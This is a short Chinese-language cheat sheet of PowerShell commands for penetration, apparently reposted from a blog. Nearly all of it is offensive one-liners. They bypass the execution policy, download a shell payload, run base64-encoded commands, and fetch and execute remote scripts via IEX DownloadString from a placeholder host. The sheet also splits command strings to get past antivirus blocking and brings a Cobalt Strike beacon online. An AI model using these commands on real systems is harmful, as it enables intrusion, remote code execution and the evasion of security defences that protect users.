powershell渗透常用命令
作者:互联网
powershell渗透常用命令
set-ExecutionPolicy RemoteSigned //开启执行策略
set-ExecutionPolicy Restricted //关闭执行策略
远程下载文件
powershell
$h=new-object System.Net.WebClient
$h.DownloadFile('http://xx.com/payload/shell/h.sh','C:\Users\xx\Desktop\test\h.sh')
命令行执行ps1文件
powershell.exe -ExecutionPolicy bypass -File "C:\Users\xx\Desktop\test\1.ps1"
远程下载并执行
whoami文件内容
##查看当前权限
$command = "whoami"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -encodedCommand $encodedCommand
正常执行会被AV拦截
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xx.com/payload/powershell/whoami.ps1')"
bypass
先将命令拆分为字符串,然后进行拼接
powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xx.com/payload/powershell/whoami.ps1'')'.Replace('11','adString');IEX ($a+$b)"
上线cs
正常powershell命令
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xx.com/payload/powershell/muet.ps1')"
拆分命令
powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xx.com/payload/powershell/muet.ps1'')'.Replace('11','adString');IEX ($a+$b)"
标签:IEX,渗透,payload,xx,常用命令,Net,ps1,powershell 来源: https://blog.csdn.net/chest_/article/details/114224819